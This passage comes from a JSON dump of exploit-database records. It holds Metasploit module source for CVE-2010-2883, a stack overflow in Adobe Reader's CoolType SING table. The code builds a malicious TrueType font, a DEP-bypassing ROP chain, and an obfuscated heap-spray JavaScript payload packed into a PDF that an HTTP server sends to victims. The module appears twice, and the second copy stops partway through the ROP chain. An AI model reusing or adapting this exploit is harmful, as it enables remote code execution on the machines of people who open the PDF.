as\r\n\r\n\t\t\t0x4a801f90, # pop eax / ret\r\n\t\t\t0x4a84903c, # becomes eax (import for CreateFileA)\r\n\r\n\t\t\t# -- call CreateFileA\r\n\t\t\t0x4a80b692, # jmp [eax]\r\n\r\n\t\t\t0x4a801064, # ret\r\n\r\n\t\t\t0x4a8522c8, # first arg to CreateFileA (lpFileName / pointer to \"iso88591\")\r\n\t\t\t0x10000000, # second arg - dwDesiredAccess\r\n\t\t\t0x00000000, # third arg - dwShareMode\r\n\t\t\t0x00000000, # fourth arg - lpSecurityAttributes\r\n\t\t\t0x00000002, # fifth arg - dwCreationDisposition\r\n\t\t\t0x00000102, # sixth arg - dwFlagsAndAttributes\r\n\t\t\t0x00000000, # seventh arg - hTemplateFile\r\n\r\n\t\t\t0x4a8063a5, # pop ecx / ret\r\n\t\t\t0x4a801064, # becomes ecx\r\n\r\n\t\t\t0x4a842db2, # xchg eax,edi / ret\r\n\r\n\t\t\t0x4a802ab1, # pop ebx / ret\r\n\t\t\t0x00000008, # becomes ebx - offset to modify\r\n\r\n\t\t\t#\r\n\t\t\t# This points at a neat-o block of code that ... TBD\r\n\t\t\t#\r\n\t\t\t# and [esp+ebx*2],edi\r\n\t\t\t# jne check_slash\r\n\t\t\t# ret_one:\r\n\t\t\t# mov al,1\r\n\t\t\t# ret\r\n\t\t\t# check_slash:\r\n\t\t\t# cmp al,0x2f\r\n\t\t\t# je ret_one\r\n\t\t\t# cmp al,0x41\r\n\t\t\t# jl check_lower\r\n\t\t\t# cmp al,0x5a\r\n\t\t\t# jle check_ptr\r\n\t\t\t# check_lower:\r\n\t\t\t# cmp al,0x61\r\n\t\t\t# jl ret_zero\r\n\t\t\t# cmp al,0x7a\r\n\t\t\t# jg ret_zero\r\n\t\t\t# cmp [ecx+1],0x3a\r\n\t\t\t# je ret_one\r\n\t\t\t# ret_zero:\r\n\t\t\t# xor al,al\r\n\t\t\t# ret\r\n\t\t\t#\r\n\r\n\t\t\t0x4a80a8a6, # execute fun block\r\n\r\n\t\t\t0x4a801f90, # pop eax / ret\r\n\t\t\t0x4a849038, # becomes eax (import for CreateFileMappingA)\r\n\r\n\t\t\t# -- call CreateFileMappingA\r\n\t\t\t0x4a80b692, # jmp [eax]\r\n\r\n\t\t\t0x4a801064, # ret\r\n\r\n\t\t\t0xffffffff, # arguments to CreateFileMappingA, hFile\r\n\t\t\t0x00000000, # lpAttributes\r\n\t\t\t0x00000040, # flProtect\r\n\t\t\t0x00000000, # dwMaximumSizeHigh\r\n\t\t\t0x00010000, # dwMaximumSizeLow\r\n\t\t\t0x00000000, # lpName\r\n\r\n\t\t\t0x4a8063a5, # pop ecx / ret\r\n\t\t\t0x4a801064, # becomes ecx\r\n\r\n\t\t\t0x4a842db2, # xchg eax,edi / ret\r\n\r\n\t\t\t0x4a802ab1, # pop ebx / ret\r\n\t\t\t0x00000008, # becomes ebx - offset to modify\r\n\r\n\t\t\t0x4a80a8a6, # execute fun block\r\n\r\n\t\t\t0x4a801f90, # pop eax / ret\r\n\t\t\t0x4a849030, # becomes eax (import for MapViewOfFile\r\n\r\n\t\t\t# -- call MapViewOfFile\r\n\t\t\t0x4a80b692, # jmp [eax]\r\n\r\n\t\t\t0x4a801064, # ret\r\n\r\n\t\t\t0xffffffff, # args to MapViewOfFile - hFileMappingObject\r\n\t\t\t0x00000022, # dwDesiredAccess\r\n\t\t\t0x00000000, # dwFileOffsetHigh\r\n\t\t\t0x00000000, # dwFileOffsetLow\r\n\t\t\t0x00010000, # dwNumberOfBytesToMap\r\n\r\n\t\t\t0x4a8063a5, # pop ecx / ret\r\n\t\t\t0x4a8a0004, # becomes ecx - writable pointer\r\n\r\n\t\t\t0x4a802196, # mov [ecx],eax / ret - save map base addr\r\n\r\n\t\t\t0x4a8063a5, # pop ecx / ret\r\n\t\t\t0x4a801064, # becomes ecx - ptr to ret\r\n\r\n\t\t\t0x4a842db2, # xchg eax,edi / ret\r\n\r\n\t\t\t0x4a802ab1, # pop ebx / ret\r\n\t\t\t0x00000030, # becomes ebx - offset to modify\r\n\r\n\t\t\t0x4a80a8a6, # execute fun block\r\n\r\n\t\t\t0x4a801f90, # pop eax / ret\r\n\t\t\t0x4a8a0004, # becomes eax - saved file mapping ptr\r\n\r\n\t\t\t0x4a80a7d8, # mov eax,[eax] / ret - load saved mapping ptr\r\n\r\n\t\t\t0x4a8063a5, # pop ecx / ret\r\n\t\t\t0x4a801064, # becomes ecx - ptr to ret\r\n\r\n\t\t\t0x4a842db2, # xchg eax,edi / ret\r\n\r\n\t\t\t0x4a802ab1, # pop ebx / ret\r\n\t\t\t0x00000020, # becomes ebx - offset to modify\r\n\r\n\t\t\t0x4a80a8a6, # execute fun block\r\n\r\n\t\t\t0x4a8063a5, # pop ecx / ret\r\n\t\t\t0x4a801064, # becomes ecx - ptr to ret\r\n\r\n\t\t\t0x4a80aedc, # lea edx,[esp+0xc] / push edx / push eax / push [esp+0xc] / push [0x4a8a093c] / call ecx / add esp, 0x10 / ret\r\n\r\n\t\t\t0x4a801f90, # pop eax / ret\r\n\t\t\t0x00000034, # becomes eax\r\n\r\n\t\t\t0x4a80d585, # add eax,edx / ret\r\n\r\n\t\t\t0x4a8063a5, # pop ecx / ret\r\n\t\t\t0x4a801064, # becomes ecx - ptr to ret\r\n\r\n\t\t\t0x4a842db2, # xchg eax,edi / ret\r\n\r\n\t\t\t0x4a802ab1, # pop ebx / ret\r\n\t\t\t0x0000000a, # becomes ebx - offset to modify\r\n\r\n\t\t\t0x4a80a8a6, # execute fun block\r\n\r\n\t\t\t0x4a801f90, # pop eax / ret\r\n\t\t\t0x4a849170, # becomes eax (import for memcpy)\r\n\r\n\t\t\t# -- call memcpy\r\n\t\t\t0x4a80b692, # jmp [eax]\r\n\r\n\t\t\t0xffffffff, # this stuff gets overwritten by the block at 0x4a80aedc, becomes ret from memcpy\r\n\t\t\t0xffffffff, # becomes first arg to memcpy (dst)\r\n\t\t\t0xffffffff, # becomes second arg to memcpy (src)\r\n\t\t\t0x00001000, # becomes third arg to memcpy (length)\r\n\t\t\t#0x0000258b, # ??\r\n\t\t\t#0x4d4d4a8a, # ??\r\n\t\t].pack('V*')\r\n\r\n\t\tvar_unescape = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_shellcode = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tvar_start = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tvar_s = 0x10000\r\n\t\tvar_c = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_b = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_d = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_3 = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_i = rand_text_alpha(rand(100) + 1)\r\n\t\tvar_4 = rand_text_alpha(rand(100) + 1)\r\n\r\n\t\tpayload_buf = ''\r\n\t\tpayload_buf << stack_data\r\n\t\tpayload_buf << encoded_payload\r\n\r\n\t\tescaped_payload = Rex::Text.to_unescape(payload_buf)\r\n\r\n\t\tjs = %Q|\r\nvar #{var_unescape} = unescape;\r\nvar #{var_shellcode} = #{var_unescape}( '#{escaped_payload}' );\r\nvar #{var_c} = #{var_unescape}( \"%\" + \"u\" + \"0\" + \"c\" + \"0\" + \"c\" + \"%u\" + \"0\" + \"c\" + \"0\" + \"c\" );\r\nwhile (#{var_c}.length + 20 + 8 < #{var_s}) #{var_c}+=#{var_c};\r\n#{var_b} = #{var_c}.substring(0, (0x0c0c-0x24)/2);\r\n#{var_b} += #{var_shellcode};\r\n#{var_b} += #{var_c};\r\n#{var_d} = #{var_b}.substring(0, #{var_s}/2);\r\nwhile(#{var_d}.length < 0x80000) #{var_d} += #{var_d};\r\n#{var_3} = #{var_d}.substring(0, 0x80000 - (0x1020-0x08) / 2);\r\nvar #{var_4} = new Array();\r\nfor (#{var_i}=0;#{var_i}<0x1f0;#{var_i}++) #{var_4}[#{var_i}]=#{var_3}+\"s\";\r\n|\r\n\r\n\t\tjs\r\n\tend\r\n\r\n\tdef RandomNonASCIIString(count)\r\n\t\tresult = \"\"\r\n\t\tcount.times do\r\n\t\t\tresult << (rand(128) + 128).chr\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\tdef ioDef(id)\r\n\t\t\"%d 0 obj \\n\" % id\r\n\tend\r\n\r\n\tdef ioRef(id)\r\n\t\t\"%d 0 R\" % id\r\n\tend\r\n\r\n\r\n\t#http://blog.didierstevens.com/2008/04/29/pdf-let-me-count-the-ways/\r\n\tdef nObfu(str)\r\n\t\t#return str\r\n\t\tresult = \"\"\r\n\t\tstr.scan(/./u) do |c|\r\n\t\t\tif rand(2) == 0 and c.upcase >= 'A' and c.upcase <= 'Z'\r\n\t\t\t\tresult << \"#%x\" % c.unpack(\"C*\")[0]\r\n\t\t\telse\r\n\t\t\t\tresult << c\r\n\t\t\tend\r\n\t\tend\r\n\t\tresult\r\n\tend\r\n\r\n\r\n\tdef ASCIIHexWhitespaceEncode(str)\r\n\t\tresult = \"\"\r\n\t\twhitespace = \"\"\r\n\t\tstr.each_byte do |b|\r\n\t\t\tresult << whitespace << \"%02x\" % b\r\n\t\t\twhitespace = \" \" * (rand(3) + 1)\r\n\t\tend\r\n\t\tresult << \">\"\r\n\tend\r\n\r\n\r\n\tdef make_pdf(ttf, js)\r\n\r\n\t\t#swf_name = rand_text_alpha(8 + rand(8)) + \".swf\"\r\n\r\n\t\txref = []\r\n\t\teol = \"\\n\"\r\n\t\tendobj = \"endobj\" << eol\r\n\r\n\t\t# Randomize PDF version?\r\n\t\tpdf = \"%PDF-1.5\" << eol\r\n\t\tpdf << \"%\" << RandomNonASCIIString(4) << eol\r\n\r\n\t\t# catalog\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(1) << nObfu(\"<<\") << eol\r\n\t\tpdf << nObfu(\"/Pages \") << ioRef(2) << eol\r\n\t\tpdf << nObfu(\"/Type /Catalog\") << eol\r\n\t\tpdf << nObfu(\"/OpenAction \") << ioRef(11) << eol\r\n\t\t# The AcroForm is required to get icucnv36.dll to load\r\n\t\tpdf << nObfu(\"/AcroForm \") << ioRef(13) << eol\r\n\t\tpdf << nObfu(\">>\") << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# pages array\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(2) << nObfu(\"<<\") << eol\r\n\t\tpdf << nObfu(\"/MediaBox \") << ioRef(3) << eol\r\n\t\tpdf << nObfu(\"/Resources \") << ioRef(4) << eol\r\n\t\tpdf << nObfu(\"/Kids [\") << ioRef(5) << \"]\" << eol\r\n\t\tpdf << nObfu(\"/Count 1\") << eol\r\n\t\tpdf << nObfu(\"/Type /Pages\") << eol\r\n\t\tpdf << nObfu(\">>\") << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# media box\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(3)\r\n\t\tpdf << \"[0 0 595 842]\" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# resources\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(4)\r\n\t\tpdf << nObfu(\"<<\") << eol\r\n\t\tpdf << nObfu(\"/Font \") << ioRef(6) << eol\r\n\t\tpdf << \">>\" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# page 1\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(5) << nObfu(\"<<\") << eol\r\n\t\tpdf << nObfu(\"/Parent \") << ioRef(2) << eol\r\n\t\tpdf << nObfu(\"/MediaBox \") << ioRef(3) << eol\r\n\t\tpdf << nObfu(\"/Resources \") << ioRef(4) << eol\r\n\t\tpdf << nObfu(\"/Contents [\") << ioRef(8) << nObfu(\"]\") << eol\r\n\t\tpdf << nObfu(\"/Type /Page\") << eol\r\n\t\tpdf << nObfu(\">>\") << eol # end obj dict\r\n\t\tpdf << endobj\r\n\r\n\t\t# font\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(6) << nObfu(\"<<\") << eol\r\n\t\tpdf << nObfu(\"/F1 \") << ioRef(7) << eol\r\n\t\tpdf << \">>\" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# ttf object\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(7) << nObfu(\"<<\") << eol\r\n\t\tpdf << nObfu(\"/Type /Font\") << eol\r\n\t\tpdf << nObfu(\"/Subtype /TrueType\") << eol\r\n\t\tpdf << nObfu(\"/Name /F1\") << eol\r\n\t\tpdf << nObfu(\"/BaseFont /Cinema\") << eol\r\n\t\tpdf << nObfu(\"/Widths []\") << eol\r\n\t\tpdf << nObfu(\"/FontDescriptor \") << ioRef(9)\r\n\t\tpdf << nObfu(\"/Encoding /MacRomanEncoding\")\r\n\t\tpdf << nObfu(\">>\") << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# page content\r\n\t\tcontent = \"Hello World!\"\r\n\t\tcontent = \"\" +\r\n\t\t\t\"0 g\" + eol +\r\n\t\t\t\"BT\" + eol +\r\n\t\t\t\"/F1 32 Tf\" + eol +\r\n\t\t\t\"32 Tc\" + eol +\r\n\t\t\t\"1 0 0 1 32 773.872 Tm\" + eol +\r\n\t\t\t\"(\" + content + \") Tj\" + eol +\r\n\t\t\t\"ET\"\r\n\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(8) << \"<<\" << eol\r\n\t\tpdf << nObfu(\"/Length %s\" % content.length) << eol\r\n\t\tpdf << \">>\" << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << content << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# font descriptor\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(9) << nObfu(\"<<\")\r\n\t\tpdf << nObfu(\"/Type/FontDescriptor/FontName/Cinema\")\r\n\t\tpdf << nObfu(\"/Flags %d\" % (2**2 + 2**6 + 2**17))\r\n\t\tpdf << nObfu(\"/FontBBox [-177 -269 1123 866]\")\r\n\t\tpdf << nObfu(\"/FontFile2 \") << ioRef(10)\r\n\t\tpdf << nObfu(\">>\") << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# ttf stream\r\n\t\txref << pdf.length\r\n\t\tcompressed = Zlib::Deflate.deflate(ttf)\r\n\t\tpdf << ioDef(10) << nObfu(\"<</Length %s/Filter/FlateDecode/Length1 %s>>\" % [compressed.length, ttf.length]) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << compressed << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# js action\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(11) << nObfu(\"<<\")\r\n\t\tpdf << nObfu(\"/Type/Action/S/JavaScript/JS \") + ioRef(12)\r\n\t\tpdf << nObfu(\">>\") << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# js stream\r\n\t\txref << pdf.length\r\n\t\tcompressed = Zlib::Deflate.deflate(ASCIIHexWhitespaceEncode(js))\r\n\t\tpdf << ioDef(12) << nObfu(\"<</Length %s/Filter[/FlateDecode/ASCIIHexDecode]>>\" % compressed.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << compressed << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t###\r\n\t\t# The following form related data is required to get icucnv36.dll to load\r\n\t\t###\r\n\r\n\t\t# form object\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(13)\r\n\t\tpdf << nObfu(\"<</XFA \") << ioRef(14) << nObfu(\">>\") << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t# form stream\r\n\t\txfa = <<-EOF\r\n<?xml version=\"1.0\" encoding=\"UTF-8\"?>\r\n<xdp:xdp xmlns:xdp=\"http://ns.adobe.com/xdp/\">\r\n<config xmlns=\"http://www.xfa.org/schema/xci/2.6/\">\r\n<present><pdf><interactive>1</interactive></pdf></present>\r\n</config>\r\n<template xmlns=\"http://www.xfa.org/schema/xfa-template/2.6/\">\r\n<subform name=\"form1\" layout=\"tb\" locale=\"en_US\">\r\n<pageSet></pageSet>\r\n</subform></template></xdp:xdp>\r\nEOF\r\n\r\n\t\txref << pdf.length\r\n\t\tpdf << ioDef(14) << nObfu(\"<</Length %s>>\" % xfa.length) << eol\r\n\t\tpdf << \"stream\" << eol\r\n\t\tpdf << xfa << eol\r\n\t\tpdf << \"endstream\" << eol\r\n\t\tpdf << endobj\r\n\r\n\t\t###\r\n\t\t# end form stuff for icucnv36.dll\r\n\t\t###\r\n\r\n\r\n\t\t# trailing stuff\r\n\t\txrefPosition = pdf.length\r\n\t\tpdf << \"xref\" << eol\r\n\t\tpdf << \"0 %d\" % (xref.length + 1) << eol\r\n\t\tpdf << \"0000000000 65535 f\" << eol\r\n\t\txref.each do |index|\r\n\t\t\tpdf << \"%010d 00000 n\" % index << eol\r\n\t\tend\r\n\r\n\t\tpdf << \"trailer\" << eol\r\n\t\tpdf << nObfu(\"<</Size %d/Root \" % (xref.length + 1)) << ioRef(1) << \">>\" << eol\r\n\r\n\t\tpdf << \"startxref\" << eol\r\n\t\tpdf << xrefPosition.to_s() << eol\r\n\r\n\t\tpdf << \"%%EOF\" << eol\r\n\t\tpdf\r\n\tend\r\n\r\nend\r\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "sourceHref": "https://www.exploit-db.com/download/16619/"}, {"lastseen": "2016-02-01T23:59:39", "description": "Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow. CVE-2010-2883. Remote exploit for windows platform", "published": "2010-09-20T00:00:00", "type": "exploitdb", "title": "Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow", "bulletinFamily": "exploit", "cvelist": ["CVE-2010-2883"], "modified": "2010-09-20T00:00:00", "id": "EDB-ID:16494", "href": "https://www.exploit-db.com/exploits/16494/", "sourceData": "##\r\n# $Id: adobe_cooltype_sing.rb 10394 2010-09-20 08:06:27Z jduck $\r\n##\r\n\r\n##\r\n# This file is part of the Metasploit Framework and may be subject to\r\n# redistribution and commercial restrictions. Please see the Metasploit\r\n# Framework web site for more information on licensing and terms of use.\r\n# http://metasploit.com/framework/\r\n##\r\n\r\nrequire 'msf/core'\r\nrequire 'zlib'\r\n\r\nclass Metasploit3 < Msf::Exploit::Remote\r\n\tRank = GreatRanking # aslr+dep bypass, js heap spray, rop, stack bof\r\n\r\n\tinclude Msf::Exploit::Remote::HttpServer::HTML\r\n\r\n\tdef initialize(info = {})\r\n\t\tsuper(update_info(info,\r\n\t\t\t'Name' => 'Adobe CoolType SING Table \"uniqueName\" Stack Buffer Overflow',\r\n\t\t\t'Description' => %q{\r\n\t\t\t\t\tThis module exploits a vulnerability in the Smart INdependent Glyplets (SING) table\r\n\t\t\t\thandling within versions 8.2.4 and 9.3.4 of Adobe Reader. Prior version are\r\n\t\t\t\tassumed to be vulnerable as well.\r\n\t\t\t},\r\n\t\t\t'License' => MSF_LICENSE,\r\n\t\t\t'Author' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t'Unknown', # 0day found in the wild\r\n\t\t\t\t\t'@sn0wfl0w', # initial analysis\r\n\t\t\t\t\t'@vicheck', # initial analysis\r\n\t\t\t\t\t'jduck' # Metasploit module\r\n\t\t\t\t],\r\n\t\t\t'Version' => '$Revision: 10394 $',\r\n\t\t\t'References' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t[ 'CVE', '2010-2883' ],\r\n\t\t\t\t\t[ 'OSVDB', '67849'],\r\n\t\t\t\t\t[ 'URL', 'http://contagiodump.blogspot.com/2010/09/cve-david-leadbetters-one-point-lesson.html' ],\r\n\t\t\t\t\t[ 'URL', 'http://www.adobe.com/support/security/advisories/apsa10-02.html' ]\r\n\t\t\t\t],\r\n\t\t\t'DefaultOptions' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'EXITFUNC' => 'process',\r\n\t\t\t\t\t'HTTP::compression' => 'gzip',\r\n\t\t\t\t\t'HTTP::chunked' => true,\r\n\t\t\t\t\t'InitialAutoRunScript' => 'migrate -f'\r\n\t\t\t\t},\r\n\t\t\t'Payload' =>\r\n\t\t\t\t{\r\n\t\t\t\t\t'Space' => 1000,\r\n\t\t\t\t\t'BadChars' => \"\\x00\",\r\n\t\t\t\t\t'DisableNops' => true\r\n\t\t\t\t},\r\n\t\t\t'Platform' => 'win',\r\n\t\t\t'Targets' =>\r\n\t\t\t\t[\r\n\t\t\t\t\t# Tested OK via Adobe Reader 9.3.4 on Windows XP SP3 -jjd\r\n\t\t\t\t\t# Tested OK via Adobe Reader 9.3.4 on Windows 7 -jjd\r\n\t\t\t\t\t[ 'Automatic', { }],\r\n\t\t\t\t],\r\n\t\t\t'DisclosureDate' => 'Sep 07 2010',\r\n\t\t\t'DefaultTarget' => 0))\r\n\tend\r\n\r\n\tdef exploit\r\n\t\t# NOTE: The 0day used Vera.ttf (785d2fd45984c6548763ae6702d83e20)\r\n\t\tpath = File.join( Msf::Config.install_root, \"data\", \"exploits\", \"cve-2010-2883.ttf\" )\r\n\t\tfd = File.open( path, \"rb\" )\r\n\t\t@ttf_data = fd.read(fd.stat.size)\r\n\t\tfd.close\r\n\r\n\t\tsuper\r\n\tend\r\n\r\n\r\n\tdef on_request_uri(cli, request)\r\n\r\n\t\tprint_status(\"Sending crafted PDF to #{cli.peerhost}:#{cli.peerport}\")\r\n\r\n\t\tttf_data = make_ttf()\r\n\r\n\t\tjs_data = make_js(regenerate_payload(cli).encoded)\r\n\r\n\t\t# Create the pdf\r\n\t\tpdf = make_pdf(ttf_data, js_data)\r\n\r\n\t\tsend_response(cli, pdf, { 'Content-Type' => 'application/pdf', 'Pragma' => 'no-cache' })\r\n\r\n\t\t# Handle the payload\r\n\t\thandler(cli)\r\n\tend\r\n\r\n\tdef make_ttf\r\n\r\n\t\t# load the static ttf file\r\n\t\tttf_data = @ttf_data.dup\r\n\r\n\t\t# Build the SING table\r\n\t\tsing = ''\r\n\t\tsing << [\r\n\t\t\t0, 1, # tableVersionMajor, tableVersionMinor (0.1)\r\n\t\t\t0xe01, # glyphletVersion\r\n\t\t\t0x100, # embeddingInfo\r\n\t\t\t0, # mainGID\r\n\t\t\t0, # unitsPerEm\r\n\t\t\t0, # vertAdvance\r\n\t\t\t0x3a00 # vertOrigin\r\n\t\t].pack('vvvvvvvv')\r\n\t\t# uniqueName\r\n\t\t# \"The uniqueName string must be a string of at most 27 7-bit ASCII characters\"\r\n\t\t#sing << \"A\" * (0x254 - sing.length)\r\n\t\tsing << rand_text(0x254 - sing.length)\r\n\r\n\t\t# 0xffffffff gets written here @ 0x7001400 (in BIB.dll)\r\n\t\tsing[0x140, 4] = [0x4a8a08e2 - 0x1c].pack('V')\r\n\r\n\t\t# This becomes our new EIP (puts esp to stack buffer)\r\n\t\tret = 0x4a80cb38 # add ebp, 0x794 / leave / ret\r\n\t\tsing[0x208, 4] = [ret].pack('V')\r\n\r\n\t\t# This becomes the new eip after the first return\r\n\t\tret = 0x4a82a714\r\n\t\tsing[0x18, 4] = [ret].pack('V')\r\n\r\n\t\t# This becomes the new esp after the first return\r\n\t\tesp = 0x0c0c0c0c\r\n\t\tsing[0x1c, 4] = [esp].pack('V')\r\n\r\n\t\t# Without the following, sub_801ba57 returns 0.\r\n\t\tsing[0x24c, 4] = [0x6c].pack('V')\r\n\r\n\t\tttf_data[0xec, 4] = \"SING\"\r\n\t\tttf_data[0x11c, sing.length] = sing\r\n\r\n\t\tttf_data\r\n\tend\r\n\r\n\tdef make_js(encoded_payload)\r\n\r\n\t\t# The following executes a ret2lib using icucnv36.dll\r\n\t\t# The effect is to bypass DEP and execute the shellcode in an indirect way\r\n\t\tstack_data = [\r\n\t\t\t0x41414141, # unused\r\n\t\t\t0x4a8063a5, # pop ecx / ret\r\n\t\t\t0x4a8a0000, # becomes ecx\r\n\r\n\t\t\t0x4a802196, # mov [ecx],eax / ret # save whatever eax starts as\r\n\r\n\t\t\t0x4a801f90, # pop eax / ret\r\n\t\t\t0x4a84903c, # becomes eax (import for CreateFileA)\r\n\r\n\t\t\t# -- call CreateFileA\r\n\t\t\t0x4a80b692, # jmp [eax]\r\n\r\n\t\t\t0x4a801064, # ret\r\n\r\n\t\t\t0x4a8522c8, # first arg to CreateFileA (lpFileName / pointer to \"iso88591\")\r\n\t\t\t0x10000000, # second arg - dwDesiredAccess\r\n\t\t\t0x00000000, # third arg - dwShareMode\r\n\t\t\t0x00000000, # fourth arg - lpSecurityAttributes\r\n\t\t\t0x00000002, # fifth arg - dwCreationDisposition\r\n\t\t\t0x00000102, # sixth arg - dwFlagsAndAttributes\r\n\t\t\t0x00000000, # seventh arg - hTemplateFile\r\n\r\n\t\t\t0x4a8063a5, # pop ecx / ret\r\n\t\t\t0x4a801064, # becomes ecx\r\n\r\n\t\t\t0x4a842db2, # xchg eax,edi / ret\r\n\r\n\t\t\t0x4a802ab1, # pop ebx / ret\r\n\t\t\t0x00000008, # becomes ebx - offset to modify\r\n\r\n\t\t\t#\r\n\t\t\t# This points at a neat-o block of code that ... TBD\r\n\t\t\t#\r\n\t\t\t# and [esp+ebx*2],edi\r\n\t\t\t# jne check_slash\r\n\t\t\t# ret_one:\r\n\t\t\t# mov al,1\r\n\t\t\t# ret\r\n\t\t\t# check_slash:\r\n\t\t\t# cmp al,0x2f\r\n\t\t\t# je ret_one\r\n\t\t\t# cmp al,0x41\r\n\t\t\t# jl check_lower\r\n\t\t\t# cmp al,0x5a\r\n\t\t\t# jle check_ptr\r\n\t\t\t# check_lower:\r\n\t\t\t# cmp al,0x61\r\n\t\t\t# jl ret_zero\r\n\t\t\t# cmp al,0x7a\r\n\t\t\t# jg ret_zero\r\n\t\t\t# cmp [ecx+1],0x3a\r\n\t\t\t# je ret_one\r\n\t\t\t# ret_zero:\r\n\t\t\t# xor al,al\r\n\t\t\t# ret\r\n\t\t\t#\r\n\r\n\t\t\t0x4a80a8a6, # execute fun block\r\n\r\n\t\t\t0x4a801f90, # pop eax / ret\r\n\t\t\t0x4a849038, # becomes eax (import for CreateFileMappingA)\r\n\r\n\t\t\t# -- call CreateFileMappingA\r\n\t\t\t0x4a80b692, # jmp [eax]\r\n\r\n\t\t\t0x4a801064, # ret\r\n\r\n\t\t\t0xffffffff, # arguments to CreateFileMappingA, hFile\r\n\t\t\t0x00000000, # lpAttributes\r\n\t\t\t0x00000040, # flProtect\r\n\t\t\t0x00000000, # dwMaximumSizeHigh\r\n\t\t\t0x00010000, # dwMaximumSizeLow\r\n\t\t\t0x00000000, # lpName\r\n\r\n\t\t\t0x4a8063a5, # pop ecx / ret\r\n\t\t\t0x4a801064, # becomes ecx\r\n\r\n\t\t\t0x4a842db2, # xchg eax,edi / ret\r\n\r\n\t\t\t0x4a802ab1, # pop ebx / ret\r\n\t\t\t0x00000008, # becomes ebx - offset to modify\r\n\r\n\t\t\t0x4a80a8a6, # execute fun block\r\n\r\n\t\t\t0x4a801f90, # pop eax / ret\r\n\t\t\t0x4a849030, # becomes eax (import for MapViewOfFile\r\n\r\n\t\t\t# -- call MapViewOfFile\r\n\t\t\t0x4a80b692, # jmp [eax]\r\n\r\n\t\t\t0x4a801064, # ret\r\n\r\n\t\t\t0xffffffff, # args to MapViewOfFile - hFileMappingObject\r\n\t\t\t0x00000022, # dwDesiredAccess\r\n\t\t\t0x00000000, # dwFileOffsetHigh\r\n\t\t\t0x00000000, # dwFileOffsetLow\r\n\t\t\t0x00010000, # dwNumberOfBytesToMap\r\n\r\n\t\t\t0x4a8063a5, # pop ecx / ret\r\n\t\t\t0x4a8a0004, # becomes ecx - writable pointer\r\n\r\n\t\t\t0x4a802196, # mov [ecx],eax / ret - save map base addr\r\n\r\n\t\t\t0x4a8063a5, # pop ecx / ret\r\n\t\t\t0x4a801064, # becomes ecx - ptr to ret\r\n\r\n\t\t\t0x4a842db2, # xchg eax,edi / ret\r\n\r\n\t\t\t0x4a802ab1, # pop ebx / ret\r\n\t\t\t0x00000030, # becomes ebx - offset to modify\r\n\r\n\t\t\t0x4a80a8a6, # execute fun block\r\n\r\n\t\t\t0x4a801f90, # pop eax / ret\r\n\t\t\t0x4a8a0004, # becomes eax - saved file mapping ptr\r\n\r\n\t\t\t0x4a80a7d8, # mov eax,[eax] / ret - load saved mapping ptr\r\n\r\n\t\t\t0x4a8063a5, # pop ecx / ret\r\n\t\t\t0x4a801064, # becomes ecx - ptr to ret\r\n\r\n\t\t\t0x4a842db2, # xchg eax,edi / ret\r\n\r\n\t\t\t0x4a802ab1, # pop ebx / ret\r\n\t\t\t0x00000020, # becomes ebx - offset to modify\r\n\r\n\t\t\t0x4a80a8a6, # execute fun block\r\n\r\n\t\t\t0x4a8063a5, # pop ecx / ret\r\n\t\t\t0x4a801064, # becomes ecx - ptr to ret\r\n\r\n\t\t\t0x4a80aedc, # lea edx,[esp+0xc] / push edx / push eax / push [esp+0xc] / push [0x4a8a093c] / call ecx / add esp, 0x10 / ret\r\n\r\n\t\t\t0x4a801f90, # pop eax / ret\r\n\t\t\t0x00000034, # becomes eax\r\n\r\n\t\t\t0x4a80d585, # add eax,edx / ret\r\n\r\n\t\t\t0x4a8063a5, # pop ecx / ret\r\n\t\t\t0x4a801064, # becomes ecx - ptr to ret\r\n\r\n\t\t\t0x4a842db2, # xchg eax,edi / ret\r\n\r\n\t\t\t0x4a802ab1, # pop ebx / ret\r\n\t\t\t0x0000000a, # becomes ebx - offset to modify\r\n\r\n\t\t\t0x4a80a8a6, # execute fun block\r\n\r\n\t\t\t0x4a801f90, # pop eax / ret\r\n\t\t\t0x4a849170, # becomes eax (import for memcpy)\r\n\r\n\t\t\t# -- call 